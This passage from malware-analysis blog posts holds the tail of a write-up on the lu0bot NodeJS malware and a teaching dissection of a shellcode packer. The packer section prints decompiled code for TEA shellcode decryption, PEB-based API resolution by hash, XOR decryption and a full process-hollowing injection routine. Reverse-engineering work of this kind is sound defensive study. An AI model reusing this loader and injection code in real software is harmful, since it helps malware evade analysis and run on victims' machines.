tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function] } },
h:
{ eval: [Function],
bufwrite: [Function],
bufread: [Function],
filewrite: [Function],
fileread: [Function] },
mp_pget: [Function],
mp_pget_ev: [Function],
mp_new: [Function: mp_new],
mp_get: [Function: mp_get],
mp_count: [Function: mp_count],
mp_loss: [Function: mp_loss],
mp_del: [Function: mp_del],
mp_dtchk: [Function: mp_dtchk],
mp_dtsum: [Function: mp_dtsum],
mp_pset: [Function: mp_pset],
mp_opnew: [Function: mp_opnew],
mp_opstat: [Function: mp_opstat] }
lq
{ ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ]
}
MITRE ATT&CK
- T1059
- T1482
- T1083
- T1046
- T1057
- T1518
- T1082
- T1614
- T1016
- T1124
- T1005
- T1008
- T1571
ELI5 summary
- lu0bot is a NodeJS Malware.
- Network communications are mixing TCP (loader) and UDP (main stage).
- It's pushed at least with Garbage Cleaner.
- Its default setup seems to be an aggressive telemetry harvester.
- Due to its task manager architecture, it is technically able to be anything.

Conclusion
Lu0bot is a curious piece of code and I have to admit, even if I don't like NodeJS/JavaScript code at all, that the task manager succeeded in blowing my mind with its ingenuity.

I have more questions than answers since I started putting my hands on this one, but the thing I'm sure of is that it's active and harvesting data from bots in a more aggressive way than I have ever seen before.
Special thanks: @benkow_
Anatomy of a simple and popular packer
It's been a while since I last released some stuff here and indeed, it's mostly because of how fucked up 2020 was. I would have been pleased if this global pandemic hadn't wrecked me so much, but I got my share as well. Nowadays, with everything closed, the corona haircut is the new trend and finding a graphics card or a PS5 is like winning the lottery. So why not fflush all that bullshit by spending some time on malware curiosities (with the support of some croissants and anime); whatever the times, weebs are still weebs.
So let's start 2021 with something really simple... Why not completely dissect, down to the ground, a well-known packer mixing C/C++ & shellcode (active for some years now).
Typical icons that could be seen with this packer
This one is a cool playground for going over the basics with someone who needs to start learning malware analysis/reverse engineering:
- Obfuscation
- Cryptography
- Decompression
- Multi-stage
- Shellcode
- Remote Thread Hijacking
Disclaimer: This post will be different from what I usually do on my blog, with almost no text, but I took the time to decompile and review all the code, so I consider that everything is explained.
For this analysis, this sample will be used:
B7D90C9D14D124A163F5B3476160E1CF
Architecture
The packer itself is split into 3 main stages:
- A PE that will allocate, decrypt and execute the shellcode n°1
- Saving required WinAPI calls, decrypting, decompressing and executing shellcode n°2
- Saving required WinAPI calls (again) and executing the payload with a remote thread hijacking trick
An overview of this packer
Stage 1 โ The PE
The first stage misleads the analyst into thinking that a decent amount of instructions are performed, but... after purging all the junk code and unused functions, the cleaned WinMain function unveils a short and standard setup for launching a shellcode.
int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
int i;
SIZE_T uBytes;
HMODULE hModule;
// Will be used for Virtual Protect call
hKernel32 = LoadLibraryA("kernel32.dll");
// Bullshit stuff for getting correct uBytes value
uBytes = CONST_VALUE;
_LocalAlloc();
for ( i = 0; i < uBytes; ++i ) {
(_FillAlloc)();
}
_VirtualProtect();
// Decrypt function vary between date & samples
_Decrypt();
_ExecShellcode();
return 0;
}
It's important to notice that this packer changes its first stage regularly, but that doesn't mean the whole thing changes the same way. In fact, the core remains intact while the form differs, so once you have reversed this piece of code, the pattern is easily recognizable in no time.
Instead of the classic VirtualAlloc, this one uses LocalAlloc to allocate the memory that stores the second stage. The variable uBytes is consistently computed behind some spaghetti code (global values, loops and conditions).
int (*LocalAlloc())(void)
{
int (*pBuff)(void); // eax
pBuff = LocalAlloc(0, uBytes);
Shellcode = pBuff;
return pBuff;
}
To avoid directly giving away the position of the shellcode, it's using a simple addition trick to fill the buffer step by step.
int __usercall FillAlloc(int i)
{
int result; // eax
// All bullshit code removed
result = dword_834B70 + 0x7E996;
*(Shellcode + i) = *(dword_834B70 + 0x7E996 + i);
return result;
}
Then obviously, whenever an allocation is made, VirtualProtect is not far away to finish the job. The function name is obfuscated at first glance and then patched back. To avoid calling it directly, our all-time classic GetProcAddress does the job of saving this WinAPI call into a function pointer.
BOOL __stdcall VirtualProtect()
{
char v1[4]; // [esp+4h] [ebp-4h] BYREF
String = 0;
lstrcatA(&String, "VertualBritect"); // No ragrets
byte_442581 = 'i';
byte_442587 = 'P';
byte_442589 = 'o';
pVirtualProtect = GetProcAddress(hKernel32, &String);
return (pVirtualProtect)(Shellcode, uBytes, 64, v1);
}
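The string patching above can be replayed in a few lines. This is only a sketch: it assumes the String buffer starts at 0x442580, so that byte_442581, byte_442587 and byte_442589 are the characters at index 1, 7 and 9.

```javascript
// Assumption: the string buffer lives at 0x442580 (one byte before byte_442581)
const BASE = 0x442580;
const name = Array.from('VertualBritect');

// The three single-byte writes performed before GetProcAddress is called
const patches = [
  [0x442581, 'i'],
  [0x442587, 'P'],
  [0x442589, 'o'],
];
for (const [addr, ch] of patches) {
  name[addr - BASE] = ch;
}

const resolved = name.join('');
console.log(resolved);
```

Three bytes are enough to keep the real API name out of the strings of the binary while still being trivial to rebuild at run time.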
Decrypting the first shellcode
The philosophy behind this packer will lead you to think that the decryption algorithm will not be that complex. Here the encryption used is TEA: it's simple and easy to use.
void Decrypt()
{
SIZE_T size;
PVOID sc;
SIZE_T i;
size = uBytes;
sc = Shellcode;
for ( i = size >> 3; i; --i )
{
_TEADecrypt(sc);
sc = sc + 8; // +8 due it's v[0] & v[1] with TEA Algorithm
}
}
I am always skeptical whenever I'm reading a manual implementation of a known cryptographic algorithm, because most of the time it could be tweaked. So before trying to understand what the changes are, let's take our time to make sure which variables we have to identify:
- v[0] and v[1]
- y & z
- Number of cycles (n=32)
- 16 bytes key represented as k[0], k[1], k[2], k[3]
- delta
- sum
Identifying TEA variables in x32dbg
To add more salt to it, you get your dose of a mindless amount of garbage instructions.
Junk code hiding the algorithm
After removing everything unnecessary, our TEA decryption algorithm looks like this
int *__stdcall _TEADecrypt(int *v)
{
unsigned int y, z, sum;
int i, v7, v8, v9, v10, k[4];
int *result;
y = *v;
z = v[1];
sum = 0xC6EF3720;
k[0] = dword_440150;
k[1] = dword_440154;
k[3] = dword_440158;
k[2] = dword_44015C;
i = 32;
do
{
// Junk code purged
v7 = k[2] + (y >> 5);
v9 = (sum + y) ^ (k[3] + 16 * y);
v8 = v9 ^ v7;
z -= v8;
v10 = k[0] + 16 * z;
(_TEA_Y_Operation)((sum + z) ^ (k[1] + (z >> 5)) ^ v10);
sum += 0x61C88647; // exact equivalent of sum -= 0x9E3779B9 (delta)
--i;
}
while ( i );
result = v;
v[1] = z;
*v = y;
return result;
}
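For comparison, here is a sketch of the textbook TEA block functions with the same constants (32 rounds, delta 0x9E3779B9, decryption starting from sum = 0xC6EF3720). It is the reference algorithm, not a byte-exact port of the packer routine, and the key and block used in the usage lines are made up.

```javascript
const DELTA = 0x9E3779B9;

// Reference TEA encryption of one 64-bit block (two 32-bit words) with a 128-bit key
function teaEncryptBlock([y, z], k) {
  let sum = 0;
  for (let i = 0; i < 32; i++) {
    sum = (sum + DELTA) >>> 0;
    y = (y + (((z << 4) + k[0]) ^ (z + sum) ^ ((z >>> 5) + k[1]))) >>> 0;
    z = (z + (((y << 4) + k[2]) ^ (y + sum) ^ ((y >>> 5) + k[3]))) >>> 0;
  }
  return [y, z];
}

// Reference TEA decryption: same rounds in reverse, sum starts at delta * 32
function teaDecryptBlock([y, z], k) {
  let sum = 0xC6EF3720;
  for (let i = 0; i < 32; i++) {
    z = (z - (((y << 4) + k[2]) ^ (y + sum) ^ ((y >>> 5) + k[3]))) >>> 0;
    y = (y - (((z << 4) + k[0]) ^ (z + sum) ^ ((z >>> 5) + k[1]))) >>> 0;
    sum = (sum - DELTA) >>> 0;
  }
  return [y, z];
}

// Made-up key and block, only there to show the round trip
const demoKey = [0x11111111, 0x22222222, 0x33333333, 0x44444444];
const demoBlock = [0xDEADBEEF, 0x0BADF00D];
const roundTrip = teaDecryptBlock(teaEncryptBlock(demoBlock, demoKey), demoKey);
console.log(roundTrip.map((w) => w.toString(16)));
```

Two constants are worth remembering when hunting for TEA in a disassembly: 0xC6EF3720 is delta multiplied by 32 (truncated to 32 bits), and adding 0x61C88647 is the same as subtracting delta.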
At this step, the first stage of this packer is now almost complete. By inspecting the dump, you can recognize our shellcode being ready for action (the 55 8B EC opcodes are, in my personal experience, the stuff that triggers me almost every time).
Stage 2 โ Falling into the shellcode playground
This shellcode is pretty simple, the main function is just calling two functions:
- One focused on saving fundamental WinAPI calls
- One creating the shellcode API structure and setting up the workaround for pushing and launching the last shellcode stage
Shellcode main()
Give my WinAPI calls
Disclaimer: In this part, there is almost no text explanation, everything is detailed in the code
PEB & BaseDllName
Like any other shellcode, it needs to get some function addresses to start its job, so our best friend the PEB is there to do the job.
00965233 | 55 | push ebp |
00965234 | 8BEC | mov ebp,esp |
00965236 | 53 | push ebx |
00965237 | 56 | push esi |
00965238 | 57 | push edi |
00965239 | 51 | push ecx |
0096523A | 64:FF35 30000000 | push dword ptr fs:[30] | Pointer to PEB
00965241 | 58 | pop eax |
00965242 | 8B40 0C | mov eax,dword ptr ds:[eax+C] | Pointer to Ldr
00965245 | 8B48 0C | mov ecx,dword ptr ds:[eax+C] | Pointer to Ldr->InLoadOrderModuleList
00965248 | 8B11 | mov edx,dword ptr ds:[ecx] | Pointer to List Entry (aka pEntry)
0096524A | 8B41 30 | mov eax,dword ptr ds:[ecx+30] | Pointer to BaseDllName buffer (pEntry->BaseDllName.Buffer)
Let's then take a look at the PEB structure
For beginners, I sorted all these values with their respective variable names and meaning.
Offset | Type | Variable | Value |
---|---|---|---|
0x00 | LIST_ENTRY | InLoadOrderModuleList->Flink | A8 3B 8D 00 |
0x04 | LIST_ENTRY | InLoadOrderModuleList->Blink | C8 37 8D 00 |
0x08 | LIST_ENTRY | InMemoryOrderList->Flink | B0 3B 8D 00 |
0x0C | LIST_ENTRY | InMemoryOrderList->Blink | D0 37 8D 00 |
0x10 | LIST_ENTRY | InInitializationOrderModuleList->Flink | 70 3F 8D 00 |
0x14 | LIST_ENTRY | InInitializationOrderModuleList->Blink | BC 7B CC 77 |
0x18 | PVOID | BaseAddress | 00 00 BB 77 |
0x1C | PVOID | EntryPoint | 00 00 00 00 |
0x20 | UINT | SizeOfImage | 00 00 19 00 |
0x24 | UNICODE_STRING | FullDllName | 3A 00 3C 00 A0 35 8D 00 |
0x2C | UNICODE_STRING | BaseDllName | 12 00 14 00 B0 6D BB 77 |
Because it first wants the BaseDllName in order to find kernel32.dll, we could suppose the shellcode would use the offset 0x2C to get the value, but it's pointing to 0x30
008F524A | 8B41 30 | mov eax,dword ptr ds:[ecx+30]
It means it will grab the Buffer pointer from the UNICODE_STRING structure: Length and MaximumLength take the first 4 bytes, so Buffer sits at 0x2C + 4 = 0x30
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
After that, the magic appears
Register | Address | Symbol Value |
---|---|---|
EAX | 77BB6DB0 | L"ntdll.dll" |
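The 8 bytes listed for BaseDllName in the table can be decoded by hand, or with a few lines like the sketch below. It assumes a 32-bit process (so a 4-byte Buffer pointer) and little-endian fields; the object and variable names are mine.

```javascript
// The 8 bytes shown at offset 0x2C in the table (BaseDllName)
const raw = Buffer.from('12001400B06DBB77', 'hex');

// UNICODE_STRING layout on 32-bit: USHORT Length, USHORT MaximumLength, PWSTR Buffer
const unicodeString = {
  length: raw.readUInt16LE(0),        // size of the string in bytes, without the terminator
  maximumLength: raw.readUInt16LE(2), // size of the allocated buffer in bytes
  buffer: raw.readUInt32LE(4),        // pointer to the UTF-16 characters
};

// Offset of the Buffer field inside the list entry
const bufferFieldOffset = 0x2C + 4;

console.log(unicodeString.length / 2, unicodeString.buffer.toString(16), bufferFieldOffset.toString(16));
```

The Length of 0x12 bytes is 9 UTF-16 characters, which matches "ntdll.dll", and the decoded pointer is the 77BB6DB0 value that ends up in EAX.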
Homemade checksum algorithm ?
Searching a library name or function behind its respective hash is a common trick performed in the wild.
00965248 | 8B11 | mov edx,dword ptr ds:[ecx] | Pointer to List Entry (aka pEntry)
0096524A | 8B41 30 | mov eax,dword ptr ds:[ecx+30] | Pointer to BaseDllName buffer
0096524D | 6A 02 | push 2 | Increment is 2 due to UNICODE value
0096524F | 8B7D 08 | mov edi,dword ptr ss:[ebp+8] |
00965252 | 57 | push edi | DLL Hash (searched one)
00965253 | 50 | push eax | DLL Name
00965254 | E8 5B000000 | call 9652B4 | Checksum()
00965259 | 85C0 | test eax,eax |
0096525B | 74 04 | je 965261 |
0096525D | 8BCA | mov ecx,edx | pEntry = pEntry->Flink
0096525F | EB E7 | jmp 965248 |
The checksum function used here seems to have a decent risk of hash collisions, but based on the number of occurrences and length of the strings, it's negligible. Otherwise yeah, it could be fucked up very quickly.
BOOL Checksum(PWSTR *pBuffer, int hash, int i)
{
int pos; // ecx
int checksum; // ebx
int c; // edx
pos = 0;
checksum = 0;
c = 0;
do
{
LOBYTE(c) = *pBuffer | 0x60; // Lowercase
checksum = 2 * (c + checksum);
pBuffer += i; // +2 due it's UNICODE
LOBYTE(pos) = *pBuffer;
--pos;
}
while ( *pBuffer && pos );
return checksum != hash;
}
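To play with this checksum outside of a debugger, it can be ported in a few lines. This is a sketch that assumes a non-empty string without embedded NUL characters, and it returns the hash instead of comparing it like the decompiled routine does.

```javascript
// Port of the packer checksum: OR each character with 0x60, add it, then double the total
function checksum(name) {
  let sum = 0;
  for (let i = 0; i < name.length; i++) {
    const c = (name.charCodeAt(i) & 0xFF) | 0x60; // crude lowercase
    sum = (2 * (c + sum)) >>> 0;                   // stay on 32 bits
  }
  return sum;
}

console.log(checksum('kernel32.dll').toString(16));
console.log(checksum('KERNEL32.DLL') === checksum('kernel32.dll'));
console.log(checksum('a.b') === checksum('anb'));
```

The OR with 0x60 makes the comparison case-insensitive, but it also maps different characters onto the same value ("." and "n" for instance), which is where the collision risk mentioned above comes from.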
Find the correct function address
With the pEntry list saved and the checksum function understood, it only needs a loop that repeats the same process: get the name of a function, feed it to the checksum, then compare the result with the hash that the packer wants.
00965261 | 8B41 18 | mov eax,dword ptr ds:[ecx+18] | BaseAddress
00965264 | 50 | push eax |
00965265 | 8B58 3C | mov ebx,dword ptr ds:[eax+3C] | PE Signature (e_lfanew) RVA
00965268 | 03C3 | add eax,ebx | pNTHeader = BaseAddress + PE Signature RVA
0096526A | 8B58 78 | mov ebx,dword ptr ds:[eax+78] | Export Table RVA
0096526D | 58 | pop eax |
0096526E | 50 | push eax |
0096526F | 03D8 | add ebx,eax | Export Table
00965271 | 8B4B 1C | mov ecx,dword ptr ds:[ebx+1C] | Address of Functions RVA
00965274 | 8B53 20 | mov edx,dword ptr ds:[ebx+20] | Address of Names RVA
00965277 | 8B5B 24 | mov ebx,dword ptr ds:[ebx+24] | Address of Name Ordinals RVA
0096527A | 03C8 | add ecx,eax | Address Table
0096527C | 03D0 | add edx,eax | Name Pointer Table (NPT)
0096527E | 03D8 | add ebx,eax | Ordinal Table (OT)
00965280 | 8B32 | mov esi,dword ptr ds:[edx] |
00965282 | 58 | pop eax |
00965283 | 50 | push eax | BaseAddress
00965284 | 03F0 | add esi,eax | Function Name = NPT[i] + BaseAddress
00965286 | 6A 01 | push 1 | Increment to 1 loop
00965288 | FF75 0C | push dword ptr ss:[ebp+C] | Function Hash (searched one)
0096528B | 56 | push esi | Function Name
0096528C | E8 23000000 | call 9652B4 | Checksum()
00965291 | 85C0 | test eax,eax |
00965293 | 74 08 | je 96529D |
00965295 | 83C2 04 | add edx,4 |
00965298 | 83C3 02 | add ebx,2 |
0096529B | EB E3 | jmp 965280 |
Save the function address
When the name matches the wanted hash, it only needs to grab the function address and store it into EAX.
0096529D | 58 | pop eax |
0096529E | 33D2 | xor edx,edx | Purge
009652A0 | 66:8B13 | mov dx,word ptr ds:[ebx] |
009652A3 | C1E2 02 | shl edx,2 | Ordinal Value
009652A6 | 03CA | add ecx,edx | Function Address RVA
009652A8 | 0301 | add eax,dword ptr ds:[ecx] | Function Address = BaseAddress + Function Address RVA
009652AA | 59 | pop ecx |
009652AB | 5F | pop edi |
009652AC | 5E | pop esi |
009652AD | 5B | pop ebx |
009652AE | 8BE5 | mov esp,ebp |
009652B0 | 5D | pop ebp |
009652B1 | C2 0800 | ret 8 |
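The walk through the three export tables can be summed up with a mock export directory. Everything in the sketch below is made up (names, ordinals, RVAs, image base); only the name, ordinal, address indirection and the hash comparison follow the assembly above.

```javascript
// Same hashing idea as the packer: OR with 0x60, add, double (kept local to this sketch)
function hashName(name) {
  let sum = 0;
  for (let i = 0; i < name.length; i++) {
    sum = (2 * (((name.charCodeAt(i) & 0xFF) | 0x60) + sum)) >>> 0;
  }
  return sum;
}

// Mock export directory: all values are hypothetical
const exportsDir = {
  names: ['Alpha', 'Bravo', 'Charlie'], // Name Pointer Table
  nameOrdinals: [2, 0, 1],              // Ordinal Table, parallel to names
  functions: [0x1100, 0x1200, 0x1300],  // Address Table (RVAs), indexed by ordinal
};

// Walk the names, compare hashes, then go name index -> ordinal -> RVA -> address
function resolveExport(dir, imageBase, wantedHash) {
  for (let i = 0; i < dir.names.length; i++) {
    if (hashName(dir.names[i]) === wantedHash) {
      const ordinal = dir.nameOrdinals[i];
      return imageBase + dir.functions[ordinal];
    }
  }
  return null;
}

const address = resolveExport(exportsDir, 0x77BB0000, hashName('Bravo'));
console.log(address.toString(16));
```

The important detail is that the index found in the name table is never used directly on the address table: it first goes through the ordinal table, exactly like the mov dx / shl edx,2 / add ecx,edx sequence.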
Road to the second shellcode ! \o/
Saving API into a structure
Now that LoadLibraryA and GetProcAddress are saved, it only needs to select the function name it wants and put it into the routine explained above.
In the end, the shellcode is completely set up
struct SHELLCODE
{
_BYTE Start;
SCHEADER *ScHeader;
int ScStartOffset;
int seed;
int (__stdcall *pLoadLibraryA)(int *);
int (__stdcall *pGetProcAddress)(int, int *);
PVOID GlobalAlloc;
PVOID GetLastError;
PVOID Sleep;
PVOID VirtuaAlloc;
PVOID CreateToolhelp32Snapshot;
PVOID Module32First;
PVOID CloseHandle;
};
struct SCHEADER
{
_DWORD dwSize;
_DWORD dwSeed;
_BYTE option;
_DWORD dwDecompressedSize;
};
Abusing fake loops
Something that I found really cool in this packer is how funky the fake loops are. They make no sense, but somehow they work and it's somewhat amazing. The more absurd it is, the more I like it, and I found this really clever.
int __cdecl ExecuteShellcode(SHELLCODE *sc)
{
unsigned int i; // ebx
int hModule; // edi
int lpme[137]; // [esp+Ch] [ebp-224h] BYREF
lpme[0] = 0x224;
for ( i = 0; i < 0x64; ++i )
{
if ( i )
(sc->Sleep)(100);
hModule = (sc->CreateToolhelp32Snapshot)(TH32CS_SNAPMODULE, 0);
if ( hModule != -1 )
break;
if ( (sc->GetLastError)() != 24 )
break;
}
if ( (sc->Module32First)(hModule, lpme) )
JumpToShellcode(sc); // <------ This is where to look :)
return (sc->CloseHandle)(hModule);
}
Allocation & preparing new shellcode
void __cdecl JumpToShellcode(SHELLCODE *SC)
{
int i;
unsigned __int8 *lpvAddr;
unsigned __int8 *StartOffset;
StartOffset = SC->ScStartOffset;
Decrypt(SC, StartOffset, SC->ScHeader->dwSize, SC->ScHeader->dwSeed);
if ( SC->ScHeader->option )
{
lpvAddr = (SC->VirtuaAlloc)(0, *(&SC->ScHeader->dwDecompressedSize), 4096, 64);
i = 0;
Decompress(StartOffset, SC->ScHeader->dwDecompressedSize, lpvAddr, i);
StartOffset = lpvAddr;
SC->ScHeader->CompressSize = i;
}
__asm { jmp [ebp+StartOffset] }
}
Decryption & Decompression
The decryption is even simpler than the first-stage one: it uses a simple re-implementation of the ms_rand function, with a fixed seed value grabbed from the shellcode header structure, which I decided to call SCHEADER here.
int Decrypt(SHELLCODE *sc, int startOffset, unsigned int size, int s)
{
int seed; // eax
unsigned int count; // esi
_BYTE *v6; // edx
seed = s;
count = 0;
for ( sc->seed = s; count < size; ++count )
{
v6 = (_BYTE *)(startOffset + count); // current byte of the encrypted shellcode
seed = ms_rand(sc);
*v6 ^= seed;
}
return seed;
}
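The same idea can be sketched as a seeded XOR stream. Big assumption here: the generator below uses the classic Microsoft C runtime rand() constants (214013 and 2531011), which is what a function named ms_rand suggests, but the packer constants are not shown in this post. The seed and data are made up.

```javascript
// Assumption: classic MSVC rand() linear congruential generator
function makeMsRand(seed) {
  let state = seed >>> 0;
  return function msRand() {
    state = (Math.imul(state, 214013) + 2531011) >>> 0;
    return (state >>> 16) & 0x7FFF;
  };
}

// XOR every byte with the low byte of the next pseudo-random value
function xorStream(data, seed) {
  const rand = makeMsRand(seed);
  const out = Buffer.alloc(data.length);
  for (let i = 0; i < data.length; i++) {
    out[i] = data[i] ^ (rand() & 0xFF);
  }
  return out;
}

// Made-up seed and data: applying the same stream twice gives the input back
const plain = Buffer.from('55 8B EC');
const encrypted = xorStream(plain, 0x1337);
const decrypted = xorStream(encrypted, 0x1337);
console.log(encrypted.toString('hex'), decrypted.toString());
```

Since XOR is its own inverse, the seed stored in the header is all that is needed to recover the next stage, which makes this layer trivial to reproduce in a static unpacker.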
XOR everywhere \o/
Then when it's done, it only needs to be decompressed.
Decrypted shellcode entering into the decompression loop
Stage 3 โ Launching the payload
Finally reaching the last stage of this packer. This is the exact same pattern as the first shellcode:
- Finding & storing GetProcAddress & LoadLibrary
- Saving all WinAPI functions required
- Pushing the payload
The structure for this one is a bit longer
struct SHELLCODE
{
PVOID (__stdcall *pLoadLibraryA)(LPCSTR);
PVOID (__stdcall *pGetProcAddress)(HMODULE, LPSTR);
char notused;
PVOID ScOffset;
PVOID LoadLibraryA;
PVOID MessageBoxA;
PVOID GetMessageExtraInfo;
PVOID hKernel32;
PVOID WinExec;
PVOID CreateFileA;
PVOID WriteFile;
PVOID CloseHandle;
PVOID CreateProcessA;
PVOID GetThreadContext;
PVOID VirtualAlloc;
PVOID VirtualAllocEx;
PVOID VirtualFree;
PVOID ReadProcessMemory;
PVOID WriteProcessMemory;
PVOID SetThreadContext;
PVOID ResumeThread;
PVOID WaitForSingleObject;
PVOID GetModuleFileNameA;
PVOID GetCommandLineA;
PVOID RegisterClassExA;
PVOID CreateWindowA;
PVOID PostMessageA;
PVOID GetMessageA;
PVOID DefWindowProcA;
PVOID GetFileAttributesA;
PVOID hNtdll;
PVOID NtUnmapViewOfSection;
PVOID NtWriteVirtualMemory;
PVOID GetStartupInfoA;
PVOID VirtualProtectEx;
PVOID ExitProcess;
};
Interestingly, the stack string trick is different from the first stage
Fake loop once, fake loop forever
By now you have understood that almost everything is a lie in this packer. We have another perfect example here: a fake loop that checks the attributes of a non-existent file, where in reality the variable "j" is the only one that matters.
void __cdecl _Inject(SC *sc)
{
LPSTRING lpFileName; // [esp+0h] [ebp-14h]
char magic[8];
unsigned int j;
int i;
strcpy(magic, "apfHQ");
j = 0;
i = 0;
while ( i != 111 )
{
lpFileName = (sc->GetFileAttributesA)(magic);
if ( j > 1 && lpFileName != 0x637ADF )
{
i = 111;
SetupInject(sc);
}
++j;
}
}
Good ol' remote thread hijacking
Then comes the inject setup function. There is not much to say: the remote thread hijacking trick is used for executing the final payload.
ScOffset = sc->ScOffset;
pNtHeader = (ScOffset->e_lfanew + sc->ScOffset);
lpApplicationName = (sc->VirtualAlloc)(0, 0x2800, 0x1000, 4);
status = (sc->GetModuleFileNameA)(0, lpApplicationName, 0x2800);
if ( pNtHeader->Signature == 0x4550 ) // "PE"
{
(sc->GetStartupInfoA)(&lpStartupInfo);
lpCommandLine = (sc->GetCommandLineA)();
status = (sc->CreateProcessA)(lpApplicationName, lpCommandLine, 0, 0, 0, 0x8000004, 0, 0, &lpStartupInfo, &lpProcessInformation); // CREATE_NO_WINDOW | CREATE_SUSPENDED
if ( status )
{
(sc->VirtualFree)(lpApplicationName, 0, 0x8000);
lpContext = (sc->VirtualAlloc)(0, 4, 4096, 4);
lpContext->ContextFlags = 0x10007; // CONTEXT_FULL (shown by the decompiler as &loc_10005 + 2)
status = (sc->GetThreadContext)(lpProcessInformation.hThread, lpContext);
if ( status )
{
(sc->ReadProcessMemory)(lpProcessInformation.hProcess, lpContext->Ebx + 8, &BaseAddress, 4, 0);
if ( BaseAddress == pNtHeader->OptionalHeader.ImageBase )
(sc->NtUnmapViewOfSection)(lpProcessInformation.hProcess, BaseAddress);
lpBaseAddress = (sc->VirtualAllocEx)(
lpProcessInformation.hProcess,
pNtHeader->OptionalHeader.ImageBase,
pNtHeader->OptionalHeader.SizeOfImage,
0x3000,
0x40);
(sc->NtWriteVirtualMemory)(
lpProcessInformation.hProcess,
lpBaseAddress,
sc->ScOffset,
pNtHeader->OptionalHeader.SizeOfHeaders,
0);
for ( i = 0; i < pNtHeader->FileHeader.NumberOfSections; ++i )
{
Section = (ScOffset->e_lfanew + sc->ScOffset + 40 * i + 248);
(sc->NtWriteVirtualMemory)(
lpProcessInformation.hProcess,
Section[1].Size + lpBaseAddress,
Section[2].Size + sc->ScOffset,
Section[2].VirtualAddress,
0);
}
(sc->WriteProcessMemory)(
lpProcessInformation.hProcess,
lpContext->Ebx + 8,
&pNtHeader->OptionalHeader.ImageBase,
4,
0);
lpContext->Eax = pNtHeader->OptionalHeader.AddressOfEntryPoint + lpBaseAddress;
(sc->SetThreadContext)(lpProcessInformation.hThread, lpContext);
(sc->ResumeThread)(lpProcessInformation.hThread);
(sc->CloseHandle)(lpProcessInformation.hThread);
(sc->CloseHandle)(lpProcessInformation.hProcess);
status = (sc->ExitProcess)(0);
}
}
}
